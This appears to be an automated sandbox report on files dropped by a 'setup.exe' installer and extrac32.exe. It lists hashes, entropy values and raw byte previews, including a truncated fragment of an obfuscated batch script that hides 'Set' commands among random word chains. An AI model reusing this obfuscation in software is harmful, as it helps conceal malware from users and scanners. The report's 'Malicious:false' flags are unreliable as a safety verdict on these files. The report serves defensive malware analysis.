                                    Preview:7.T%ZHF....X`g.bn).A!..@...nD...$.)...W>y_U.+O.....u..>..uM..%..3.=.S..|..0k._I.NC...i.. .p....0s4.$]..P%..T.X...|.sW.u..R.W...&....D$.L.|.vU...Z.-.6.g.Q...W8]&.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....2.G.'.F...h..............s....D.s....DkC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..q.W..,P..Myn.2..t.W....b2..8...2/dk.s..Z..D.s....Dm......=.r8.5...x..2).U.j.....>.,#...w.L.)......=.=.k..=N ..{..?.....$....a..9 ..F/.._..@.Y.L..l.`.+g......u.s r.....6.F...).....A.P.w.\..2.bto...(..};.dN.p@.I....n...3.....L..4.C.;v..._Z.d]Y~..?.x|,.3.J0.....k9.7...^.M.x.@..&l..m..dlv..._RR..e+...y.q....MX..\..q...r..%b^..hs+.x../-.2.8..:...B..3.b.....*.......vi].C.``..I.F=n...b.
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):120832
                                    Entropy (8bit):4.977651511379863
                                    Encrypted:false
                                    SSDEEP:768:Vc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:ePdKaj6iTcPAsAhxjgarB
                                    MD5:E00C2E4747E1DBE85F4EF7AC364713D2
                                    SHA1:B1FAA76A14A9AB5B0B4DE38BFB342AF32A67C520
                                    SHA-256:599BC7DE6330DED6D1DC02745BD0F1F1EE47C94B9916C77EAA7A6CCF716E4B56
                                    SHA-512:5216F4D623BB24149D761333E5DB0522B65531DF807C4B2AA30FE3B90DBFD67A664DA392EFE53CA289CE8DE88686359514F857F248AC8C4E604AB19602630F99
                                    Malicious:false
                                    Preview:............................... !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~..................................................................................................................................>......................................~...~..................................................................................................................................................................................................................................x.......................................................................................................................................................................................................................................................................................................................b........\... ... |....................................................................L...........I..............................................................
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):86016
                                    Entropy (8bit):7.998113629509524
                                    Encrypted:true
                                    SSDEEP:1536:La+QqWrboc69uaIR/8vQ1HhIt3+rm/xSWBIrjHdcA2fgrffns3ATtO4v2sBXWD8n:LavnYuT2qhI8hWmfWAeaffns3A5v2sBT
                                    MD5:70749708F82F6478C9447EAA6424E676
                                    SHA1:893782A94DBFE80E69ACD8E566ED01BC9BA4DA2D
                                    SHA-256:9109513040827DAF8261AB6D67673E5FA1EC7261CD18CD93BB94EC7BC10CCAED
                                    SHA-512:624D217DA8850EBAAA592791310699DFBE52A1733266EA389A908C3E1C697F8947D336E07B834DDCE58AAC4690B3832ED9504EA4C595C3B34DDCA47E2BF2B852
                                    Malicious:false
                                    Preview:c....v.Kuf]z.....1.....7.l...q.S.v%.l..n.L....,.9.(.jC.....D...O.nJ.f.i0.0[E.~...Ea<X.>.r4.P.....]..h%..o@.j.oL_b<v.c....2...4...$[....$..z...*ls`.N.L..^.a.....%z.s.$^...Z...4~......H...6..b........V*.7&.A..........3\..]..A)...}1.(..NA...y~..Wt...0.a[......$G...z.....mi.#Wyk.........!.Uf....e1.43"....?...........Yf9)..[n;4|s....7mT^gpw_...B..k..S....q...j.L%.JGHU..{sy}-e......'W..T|=."taGi..l.,... w.5A......Mj.....3fO.P...Gm.=............#...M..l.4.{..xNr.#@.@.n6.H.... ....;.XV.z.D..{........6.........t..S.^7._9h..-..o.\,fB.8.L..x.. |...4.#.2w..l.?.....v...?.M.C.....{.g..P.....ys....K.....l..0.5.P.S.i.W.Lb....u.l.U5.....e_..l.:&...RU.B..^.!../.`..-..^..J..z.....3mn.v.D[i.<.,...;I.......8|...7'U1TJ..V........l...P.n?9.........tO!#..=[....B.=.}&.p..GE.V2..3.nF...G.9r..}Y..+R'b......2...L..e..b..0.}c.=....9...l6.i'k.G..;...mCt'.PI.r..1....v.:.&N.^..'f]K.....(,.S...rjH.;.-...x[f4.C.....j.<..wz...o.Z...{B.....5`..w.=....'...zSN...\1+.F...,.
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):95232
                                    Entropy (8bit):6.601424826120088
                                    Encrypted:false
                                    SSDEEP:1536:mCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyRXzW8/uC6LdTmHwANUQlHS3cctlt:dtCZEMnVIPPBxT/sZydTmRxlHS3NxrHv
                                    MD5:DC66D0464185B03BFE2A8260383C81C9
                                    SHA1:DF7E225A3854EC88CD70637B2E6855F77DCBCD0D
                                    SHA-256:7A98FB9CF35EFA46A9F79D2427E487DD3265B9A123FE4E35E840FF8ADB439163
                                    SHA-512:D4B4AB5EF3FFE765E960FC42FCBA2B0F952D62AF59BB0232B4E0CC5664584389A3F2269081737F241EF426FE264BDA50B09EE76815E56B3BFDA942DA4D856199
                                    Malicious:false
                                    Preview:F.].....t...T$..C......3...@...x...H.t..I8.A......x...H.t..I8.A...E(...M..B.......|.......F...3...Pj.S........D$.....;........D$,PW.L$`..&...D$,P.L$L......t$..D$Lj.PS.1.......L$H.es...D$.G;.r.....j..D$.P.L$`.\'......u..T$....@...x...H...5....-....M.....W..j.S........3...~<.D$,PV.L$`.X&...D$,P.L$L....Vj..D$PPS........L$H..r..F;.|.T$..D$.@j.P...H.........'........}$.........$...A....D$x...A..A..q$..;.u..V..$...$.........$....$........&...D$..D$.j.P.L$`.$.........P&...t$t...T$..R$..j.j..L$4.s9...D$8.D$..%...............D$...$.........%..j.j..L$4.:9...D$8.D$..;%...T$....@...x...H.t..I8.A......x...H.t..I8.A....%........&...$......I..$.........$.........$.........D$...I..D$ .....D$$.....D$(.....D$H.....D$P.....D$T....j...$....P.D$.P.L$d..$....t+..$.....t..$....P.L$L......D$HP.L$ .T....|$$..u0.T$....@...x...H.t..I8.A......x...H.t..I8.A...4.M..$...W..j.S.w......3...t..D$ Vj..4.S.N...F...;.r.L$H.}p...L$..D$...I.......t$ .G.......$......I...$..........$.....$....U..
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):66560
                                    Entropy (8bit):7.997373986972398
                                    Encrypted:true
                                    SSDEEP:1536:KL9+7xsQUYkY3K72EMzucnMODb/6fzeAj7YvxRbQwiobuLJW2Va:cLp2EMzlDeqAXA8obEW2Va
                                    MD5:A28E0FD0589CF3EE47720C0C92BADF5D
                                    SHA1:AEE3105D5C4B9B0027CE9A28EF2BFA00478107FB
                                    SHA-256:428F17428E1D81642AF3EA662667D3DE1813B92DA57FD9F1DA8A5F0B1B86A2CE
                                    SHA-512:140D6D0445E611676FCDF0EF24AD6BD7FFD14B5A2A8F5D8AAF617AFEFCAC48FD5F2BB07012DB641F24C71E0D871D8278325C3E5D3738520BB4C652EDEE0053C5
                                    Malicious:false
                                    Preview: .][[{A..H.D.A9......Y..."e...r..f.H.m]-u.|oF..r.%a.....::....C..p...........-...w$..m.......W.4(i.S.h4.!d...Enn}...9..^.h~.U..u.}S./.yU......*........W.5,0....q...E@...%?.....X..e.*..Y.....y....j(V;&.....a..o...Gm(.J.m >...dFo....k..fg&...@......Ru%*.K.y5.Z.R.g.......G..T.9....5.....b....GR&4B.)C./..7.0:... ...H...9.w>ma+... .7>..,%..\t...S....x.t.3.&.......9..&....Q$..,.J.`u.]...7.6.&.0R.u{=..K.R...?...FI..y.3...w..+<._Y8...k..t..)..jjT./.N....Y%(.h.r@$..x.q..k...J.2.2+#3.d...,..>..as....E..h.R..3C..A..3X...*o.G(../...t..}c.U r..T.Y....|...?.v.`.Y...,c2.I..^P.>.c,...+..o.o+.'.....J....2x9H..Q..S.......VU..W.F.j9`..j.9..D.:..XQ......\;Y.Q.E..q.:3X.o..c....B..R..#.{.c<.u.x}\.U?2..../X.y......my%..UF..i..f9h.oG....X.Z...R...=...Db........c9...'.Luu-......|.s...t....I.....j.E7...w$0.6.....6.x:.Z."....].+....w....l.T....]...&....u//.7.M.Y.Z...0..=...o...u..v.u.z.....m?h...?.MF'~.....}.u.@0f.<..z...x.. ...Y.V..."n....n.....x..s.`../.4...#...[.
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:ASCII text, with very long lines (684), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):14104
                                    Entropy (8bit):5.141266308965311
                                    Encrypted:false
                                    SSDEEP:384:kBc53vyipJazsPe6JrGSlc2H09jLy/YtiKlow3lk:kaJvvpJazsFGSlc26iYtnlox
                                    MD5:3920A54C66B165ED2257B65941318CC5
                                    SHA1:C55E948965FE55152671F152638B190FEE98C83A
                                    SHA-256:6C8B78C5EBBD2D83F157A0D05BEEA1ECBC293A6F272768AAA35B9DFABC99E610
                                    SHA-512:0473C5E86C165C7F16A254F62930A12DED3E2F17D80F76CED33FD3475696D739C2B10077E5F076B4433DFE8CF237D39E5B667A6A798E13F2A1DC23DF79D225F4
                                    Malicious:false
                                    Preview:Set Numerical=c..VpvEz-Nose-Integration-Nh-Knew-Cocks-..GMOEBay-Hill-Compound-Recordings-..iiRHash-Antibody-Dna-..raAccordingly-Bidding-Participating-Leisure-Tomato-Clicks-Hoped-..ucSSCustoms-Changed-Measurement-Ieee-Affiliates-Wow-..auwONhl-..VDpHttp-Smoke-Agenda-Oakland-Per-..rAXp-Demonstrate-Newer-Vulnerability-Duty-Ecommerce-Cu-Anyone-Disable-..RrrFemale-Swimming-Bacterial-Supplies-Intelligent-..QAUser-Theorem-Hose-Airports-..Set Greene=R..FwkwFort-..NWZdMini-Peru-Matter-Meters-Surveillance-Possible-Shakespeare-Stuffed-Camera-..TujPart-Any-Dosage-Hazard-Husband-Europe-Sox-Sheer-..dVTrack-Horse-Hosts-Will-Netscape-..laZrSafely-Stationery-Du-..wFZBlog-Settle-..LQLucia-Medicare-Zoom-Camera-Revenues-..jHsGear-Howard-Channel-Algorithm-Conflicts-Trails-Switch-..EMmDSenators-Server-..yoRegularly-Rd-Pst-Oc-Lafayette-Attractive-Carry-Conventions-..Set Interfaces=Q..RznwBrazil-Norwegian-Foot-..ewShirts-Medicines-Dsc-Newly-Clicking-Harley-Enemies-..vaYVWrite-Seeker-Fence-Bl-Amendment-Hazardou
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:ASCII text, with very long lines (684), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):14104
                                    Entropy (8bit):5.141266308965311
                                    Encrypted:false
                                    SSDEEP:384:kBc53vyipJazsPe6JrGSlc2H09jLy/YtiKlow3lk:kaJvvpJazsFGSlc26iYtnlox
                                    MD5:3920A54C66B165ED2257B65941318CC5
                                    SHA1:C55E948965FE55152671F152638B190FEE98C83A
                                    SHA-256:6C8B78C5EBBD2D83F157A0D05BEEA1ECBC293A6F272768AAA35B9DFABC99E610
                                    SHA-512:0473C5E86C165C7F16A254F62930A12DED3E2F17D80F76CED33FD3475696D739C2B10077E5F076B4433DFE8CF237D39E5B667A6A798E13F2A1DC23DF79D225F4
                                    Malicious:false
                                    Preview:Set Numerical=c..VpvEz-Nose-Integration-Nh-Knew-Cocks-..GMOEBay-Hill-Compound-Recordings-..iiRHash-Antibody-Dna-..raAccordingly-Bidding-Participating-Leisure-Tomato-Clicks-Hoped-..ucSSCustoms-Changed-Measurement-Ieee-Affiliates-Wow-..auwONhl-..VDpHttp-Smoke-Agenda-Oakland-Per-..rAXp-Demonstrate-Newer-Vulnerability-Duty-Ecommerce-Cu-Anyone-Disable-..RrrFemale-Swimming-Bacterial-Supplies-Intelligent-..QAUser-Theorem-Hose-Airports-..Set Greene=R..FwkwFort-..NWZdMini-Peru-Matter-Meters-Surveillance-Possible-Shakespeare-Stuffed-Camera-..TujPart-Any-Dosage-Hazard-Husband-Europe-Sox-Sheer-..dVTrack-Horse-Hosts-Will-Netscape-..laZrSafely-Stationery-Du-..wFZBlog-Settle-..LQLucia-Medicare-Zoom-Camera-Revenues-..jHsGear-Howard-Channel-Algorithm-Conflicts-Trails-Switch-..EMmDSenators-Server-..yoRegularly-Rd-Pst-Oc-Lafayette-Attractive-Carry-Conventions-..Set Interfaces=Q..RznwBrazil-Norwegian-Foot-..ewShirts-Medicines-Dsc-Newly-Clicking-Harley-Enemies-..vaYVWrite-Seeker-Fence-Bl-Amendment-Hazardou
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):123904
                                    Entropy (8bit):6.585035876941469
                                    Encrypted:false
                                    SSDEEP:3072:sBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfj:sjphfhnvO5bLezWWt/Dd314V14ZgP04
                                    MD5:CF91C73A94C610C69B320295C8DAD484
                                    SHA1:072EEA695B66B844368162FA6B364303B8225CEF
                                    SHA-256:B2C059189C73B2238D6541D5CD374AB26D76C37DE816C35B273B1075ED96CACC
                                    SHA-512:358C2473EF23865C84A21487B949BABFA9BEF3BF5D5DDE3355316282A27BC70E1119CF2874543C64295975CF46271290B16163D073B2DD612892FFA636A3A2C8
                                    Malicious:false
                                    Preview:..I..L$(......#...j..........j.....I...........W....I..........L$.....3.PPj.W.D$.....I.H..~A.\$...h.....D$<PSW....I..D$8P.L$..wt..j..L$..0...C;.|.t$$.\$..].h.....D$<P.t$.W....I..D$8P.L$..9t...D$...P....W....I...j.j..H.........L$..)....E....I....Q...Z..J...t...t..I8.A.........t..I8.A......z...B.t..@8.@......I._^3.[..]...U..E.SVW.@....0.......^..C...u..5.#M.....I.....I........E....Pj.....I.....uE.u........&..F........H..|9...D9.t..@8.@......|9...D9.t..@8.@......V....I...u0.u....1....&..F........H..|9...D9.t..@8.@.......3P.VT..YYV....I..5.#M.....I.....I.Vj.....I...u;.u.........&.3.B.V....H..|9...D9.t..@8.P..|9...D9.t..@8.@......I._^3.[]...U..E.VWj..@..0.~............u...Y...g....>3._.F.....^]...U..QQVWh..... ...YP.M...H...}.3.f...E..@..0...D....F.h....W.0....I..M..E.P.v....E..(.u.j.P....W........_3.^....U..S.].VW.{...s.r..v........F..8.C..0......W...6......j..F..0....I..u..........>3._.F.....^[]...U..QW.E...Ph....j.h.~L.j.j.h......X.I...u=V.u....M....&.3.B.V...^.H..|9...D
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):79872
                                    Entropy (8bit):5.8568364629581415
                                    Encrypted:false
                                    SSDEEP:1536:5VGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwu9:/q8QLeAg0Fuz08XvBNbjaAt9
                                    MD5:790CAB68480DA239A8340E419E741DC4
                                    SHA1:6A452363588EF0C76C6CD0AA06DED84081E6473D
                                    SHA-256:AA9048B39A86F5740B0C67AF9015B4338E5E30B3260661267A24B13F72B27E3D
                                    SHA-512:8174D075C5B9FCB1D7591937DA3147947835E11C656193FFB36013FE3463AFD38CAD5F9FF91864640510FDC8CDE9F8DFD1A47E5A8F652179EBFB1443DCD30D83
                                    Malicious:false
                                    Preview:.X.I.T.R.E.G.I.S.T.E.R.....G.U.I.C.T.R.L.C.R.E.A.T.E.T.A.B.I.T.E.M.....G.U.I.C.T.R.L.S.E.T.D.E.F.B.K.C.O.L.O.R.....I.N.I.R.E.A.D.S.E.C.T.I.O.N.N.A.M.E.S...G.U.I.C.T.R.L.C.R.E.A.T.E.B.U.T.T.O.N...D.L.L.C.A.L.L.B.A.C.K.R.E.G.I.S.T.E.R...G.U.I.C.T.R.L.C.R.E.A.T.E.U.P.D.O.W.N...G.U.I.C.T.R.L.C.R.E.A.T.E.S.L.I.D.E.R...S.T.R.I.N.G.R.E.G.E.X.P.R.E.P.L.A.C.E...O.B.J.C.R.E.A.T.E.I.N.T.E.R.F.A.C.E.....G.U.I.C.T.R.L.S.E.N.D.T.O.D.U.M.M.Y.....F.I.L.E.C.R.E.A.T.E.S.H.O.R.T.C.U.T.....G.U.I.C.T.R.L.C.R.E.A.T.E.I.N.P.U.T.....S.O.U.N.D.S.E.T.W.A.V.E.V.O.L.U.M.E.....F.I.L.E.C.R.E.A.T.E.N.T.F.S.L.I.N.K.....G.U.I.S.E.T.A.C.C.E.L.E.R.A.T.O.R.S.....G.U.I.C.T.R.L.C.R.E.A.T.E.C.O.M.B.O.....G.U.I.C.T.R.L.S.E.T.D.E.F.C.O.L.O.R.....P.R.O.C.E.S.S.S.E.T.P.R.I.O.R.I.T.Y.....G.U.I.C.T.R.L.S.E.T.R.E.S.I.Z.I.N.G.....S.T.R.I.N.G.T.O.A.S.C.I.I.A.R.R.A.Y.....D.R.I.V.E.G.E.T.F.I.L.E.S.Y.S.T.E.M.....G.U.I.C.T.R.L.C.R.E.A.T.E.D.U.M.M.Y.....T.R.A.Y.I.T.E.M.S.E.T.O.N.E.V.E.N.T.....G.U.I.C.T.R.L.C.R.E.A.T.E.R.A.D.I.O.....W.I.N
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):66560
                                    Entropy (8bit):7.996878369279497
                                    Encrypted:true
                                    SSDEEP:1536:N8pqsRtX4EHoqNLeUDtUgnQ+e40aVNYB/T:N8pzR8CDVd0aVNQ
                                    MD5:0183DBFF21A2CBF2EF2051F92FB261EA
                                    SHA1:6311B1D7D18D9196BCA94175BED8BF00421E1D02
                                    SHA-256:4155AEBE1D5968E2F2BF007DDB715BCA2D3CEC57C641E57A7D7406E767F76F60
                                    SHA-512:6E2B8E075B491387F80E4EED11AA43D9FD6735EA7FF9599D61F98108630253FE81A0255547148D85A5F733987F257E23666291BF56F72D6BAA5BA939ADDA5016
                                    Malicious:false
                                    Preview:h..0...4..:......ZH.|Jigc...r]V.j........D..s..=....UV.We.L..#.`o.?.-E:..abl.Y...g..k..C..}.....S...F....h..PWt.M05<.p.q.!.?QZ......R..,n.7'W..j.L"G..=..7"..g.......n...@.Y...M.FK...Gv..W..n.H.."M..B....B..5%.X.=.W.L...Bo..g..\....^..6.G....4..Y....+.At...C..e*.......;......f6nh.....U..M0..9.ih^p....B.....<7....<1.w.D]$.f..u.b,H[)..E..o.-3....7f............N..a/.....GQ..[y.F........[g@..R.......b....c8..[{.@...d..J..TC....v.v0RPA..r.zBM....y*..c......D.....|.....2a.M...6q...N....B~.........M).f.....!.;].....'s..D!.-..Ud..b......f..<.A...J..n-.?"..M...M9..h.*r..T./.....\..X.gIC.Y.(:#)N...*{...x.68..X.....h....v..3.....0...(.e.[}........)....$Vx..k.P.@@+>...1F.".X$..B.......a../.bt.>......@.H...J.|........NG...in....C.. .r.$.Y..`.S...Gq.c...R82.fH.?....[.(...ls...PK=?/|...J.2...m.&.Y...#.....D......:.v.LQ..,..T....t.?f.S..A..).nl....J..e.....-$.<E..~...e.*.......s..I...83..j.....K...G!....Y..}...D.HD..........n......I!c.H..+..&.*....@..Cb
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):62464
                                    Entropy (8bit):6.549717665973685
                                    Encrypted:false
                                    SSDEEP:1536:L1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpV:LZg5PXPeiR6MKkjV
                                    MD5:34FC9DE0E1CA03EF501F44959FF2A326
                                    SHA1:C979CB07E3CD37B04287C171E5B2D627B6FB1571
                                    SHA-256:A68BB7207AAACD1B7FD4EE1AB4DAFC71BD464CF3386F7A1A4753391CE7A7C25C
                                    SHA-512:1E4B43A54AB2342BE65F2F9007FF45FFD0053477CBF5B04E259E73EEE7C4506828797DC559EACFB08499A3F90E1142F58AE1E05787341DF614B42A2513E7E6AB
                                    Malicious:false
                                    Preview:.F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2519
                                    Entropy (8bit):7.557676395333429
                                    Encrypted:false
                                    SSDEEP:48:V4EC5+MV0Hhg5XKU+pp0OmyOO2UKxbQ0JYcmcY1BwPuKGPakfDb13g:V4EDzHy5Xz+ppo+zAbQ6YhbBwGKGP5hw
                                    MD5:27913DCE14BDD76823839E1BFBCA784F
                                    SHA1:02C2FD9AB4BFCDFC1B1429CCC3084CEFDF457164
                                    SHA-256:B58D374B43B871D5D309DD55B68E4DBE3373744DB8E11DA3EED17F80A972B240
                                    SHA-512:2F3DF0DBD99B8C191006E652713C7505A2211E7D081E2D65541F0651668BD0A6C18E4EC6459080C6885BE0A3211C0BE82F58DE546DC9D6CB7BE2648311C6560D
                                    Malicious:false
                                    Preview:n...QBD....8..NNZ.G..6Iw0.q7..!.u..a.?w.....l..Mt....9...^.........n....af.j..:e.Y..5...(....p....u..:......%....'YLv9[.........0....3H..md.,zXO.K.I.d.c.y=....X..BEyn...\T.e........o...gn........p.y.....'.7.2...c<(L.........&0.."0...U...........0...U.......0....0...U.......l..............gS.0...U.#..0.....K...E$.MP.c.......0>..+........2000...+.....0.."http://ocsp2.globalsign.com/rootr306..U.../0-0+.).'.%http://crl.globalsign.com/root-r3.crl0G..U. .@0>0<..U. .0402..+........&https://www.globalsign.com/repository/0...*.H.............I.^..Z.a*M.J.)........z.5...3.mr."NA?m......_...,..;...6Yy..t.....h...eYB..U9...&.q8..!...N.[`jC.}..`a...^N2..l.<....vji.....XO..2J.T.8.;..u....|%'.&..S....a52.....:..h.r..$<N.S<....5,..B)._`..Ba..Wj3B.51..>7+...$.N...G. .a...3.-....<..#...4.0.._0..G.............!XS..0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0...090318100000Z..290318100000Z0L1 0...U....GlobalSign Root CA - R31.0...U...
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):55296
                                    Entropy (8bit):7.997342472955196
                                    Encrypted:true
                                    SSDEEP:1536:f5ZmvfXHUGnSl9TzY4ffOUNP5ZLGLVhy0feGSVk1K+4ivg:vGtiY4ffOubGx40V1i
                                    MD5:121CAC13F89F021D263F4F9D1667492D
                                    SHA1:B5A5E2E45CDA0521C423B22FB2EE31C5E5970458
                                    SHA-256:56F941163F554FE29969F6D01BF3A1D1BCDFC995E8B502AA929F4796568E7761
                                    SHA-512:FC32C9355CCDA57C92A7013A1A0B8E56543C4BFA1B62AB7C3E7235DFA90C27A918B50C68025DA755AEE36186FD928119A76B1C019EE3E243D0820348056E6993
                                    Malicious:false
                                    Preview:7.T%ZHF....X`g.bn).A!..@...nD...$.)...W>y_U.+O.....u..>..uM..%..3.=.S..|..0k._I.NC...i.. .p....0s4.$]..P%..T.X...|.sW.u..R.W...&....D$.L.|.vU...Z.-.6.g.Q...W8]&.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....2.G.'.F...h..............s....D.s....DkC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..q.W..,P..Myn.2..t.W....b2..8...2/dk.s..Z..D.s....Dm......=.r8.5...x..2).U.j.....>.,#...w.L.)......=.=.k..=N ..{..?.....$....a..9 ..F/.._..@.Y.L..l.`.+g......u.s r.....6.F...).....A.P.w.\..2.bto...(..};.dN.p@.I....n...3.....L..4.C.;v..._Z.d]Y~..?.x|,.3.J0.....k9.7...^.M.x.@..&l..m..dlv..._RR..e+...y.q....MX..\..q...r..%b^..hs+.x../-.2.8..:...B..3.b.....*.......vi].C.``..I.F=n...b.
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):95232
                                    Entropy (8bit):6.675937966451431
                                    Encrypted:false
                                    SSDEEP:1536:WU0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOc:WUDQWf05mjccBiqXvpgF4qv+32eOyKOv
                                    MD5:1566ECCF93E2CF411095AE7D38F9B538
                                    SHA1:D4D1B7AC1B4B797FE4F5BE148EDD67086B423CE5
                                    SHA-256:C85D1D34B1428742A37A9D5E70DA2C117DACC261C8C80B71C5CC9D024BD693A4
                                    SHA-512:955C339107F9B5C7DA04695B6A7541EADFA6A993D1556814E09D48B11E3BD2BA984D848A4CE2293CFBB724AB8D5EF022AF083B7E27920CC561DD0FEC2F3C90EA
                                    Malicious:false
                                    Preview:f;.......j.Yf;........M.....]....E..E..E...|....E..M...l....E.;}.........B..E..Ch...E..u..U.j.X...u..E.....].....E....},..}(.O<.G...H........8...;.........@...;.........+.E,.........+.;...........M,.U............P...;.v0.u...+...PRQ..[...U.....P...+.....M.4V.u..u..U...@.....t.j\Y;........}........;........}....}...u...j(X;...u...j*X;.......j+X;.......j?X;.......j{X;.........x...3...E..........E..@.........U.j?X;...J...........3.+.........$..`...............t|.....V.................>....M...u.....M.](.E..E..E..E..C +C....E..E....#E.M.....M...|....U.f..j.X..U......9O ............E..M....E..M...E..M....E..M............E..0.E,..t.+.@..........+...;...........E._^[...P....U..W............T...j?Xf9F.......j#Xf9F...............j*.u.X...f;........E......M.3..M(..E.j?.].A +A....E.X.}.f;...........u.j:Z.....;...........U..<...........v.....................j.[+.......j.[+...r...j*[+...3...3.j)...M.[.E..M.f;............f;.....t6.r....jiZ.u.f;.........B....E........j).]..[..f;
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:SysEx File -
                                    Category:dropped
                                    Size (bytes):95232
                                    Entropy (8bit):7.998019845217082
                                    Encrypted:true
                                    SSDEEP:1536:NpADrTdpietp2PbPlzFHEEkXQ+j39j2sILI2ZHBg2cHp5SnSczmypVinb8dU37Ys:8rTdpie6L9FHHqQkj2sILI2ZHBg2cHvP
                                    MD5:447B140C1F12CD49016AFE335C8C51C3
                                    SHA1:55A0BC8373C2DA82FB292C491C9B73D0BD253EA0
                                    SHA-256:C11A882371A911CB7432500F394AE8EC19E28755B9CD2C66446DF4AC61020292
                                    SHA-512:3FAC38C13F0CA17FE5AFBCCE5789E075706C4D1669AFF31CE78966661207052D12F7833AF51C1053B5CFAC5CDA6DD761133E442F78B18C50F69966B2A8038C3B
                                    Malicious:false
                                    Preview:.<..\1..#.m.I......> T...F.?."B.../.:..3K...fl.t\V.]..z.g .._'+mci.#.>.n.lAr.L.X..<.8....a........q........bl.W..E.gy....`p.t..:.)[....eR....rw...3..7O....K.....W...V.j.+.....C.6{.V2..LS.>..[yh...B.....<KK...W.....sA.}.O.].TS...../..z....L..0..{..T...}..#../...'.dA2)Q_...f F.H....1u..Qn.h...@.?...t:<.V.....[....a..fO.\.!%...m.}.. .. .H.o..{n.-d..O...m=eO{.q.@."7......C..|=.\...s....`f...4...!)C..X.:^...@...k.W.6..iLP..y..t..^..o/+?)._xiO6.#...9%T^.A=S..@...U...F. .eR...uBNL....`...S.'>.......kH..+.5..)q..:..<C.6. 6...j..c.....o.k..a.Z.zy?..|T...8...Jc.y...Qj.{.=l../;.gX.......IrJ...@...T.(.+g..h...D/.7..)....a=9...5......0...a...p.wu>.|..^Md.v........l}.0..KIQ../J....nl^.%2J[.........NLK.d..c.....]..1...?.f.E...0.e..z4.u....i......'._9.!.X.+....eJ.......... .iA.I.z..r..4..a.b...C.......,~z.C.b....y..!.[.}...=.;.a.0..+....Q.+...e+.Au..../..j.3....I.....e....h2J..Ru....{..m..,.......&...Xr._..<...`...+u....g...c......(.......w.]..E.
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):96256
                                    Entropy (8bit):7.998208168184681
                                    Encrypted:true
                                    SSDEEP:1536:wKURQgEFHKeEvxZFCcQCEtf6oYQqnv/2yiHJqUpeSH55uAXRh9J/LzKxH7yG6NMr:wKeQRFqvfF8/w3QCmnp5H5UAXRh9J/XM
                                    MD5:86E877927A1C9043A7F1AC211569C47F
                                    SHA1:DD4AD496D98B1804EF7C312D7D72FDD28A7A71F7
                                    SHA-256:3BB527137A86322C9BB94D12D96337C386C0BDF21AB0188E88F7B5AA5565B287
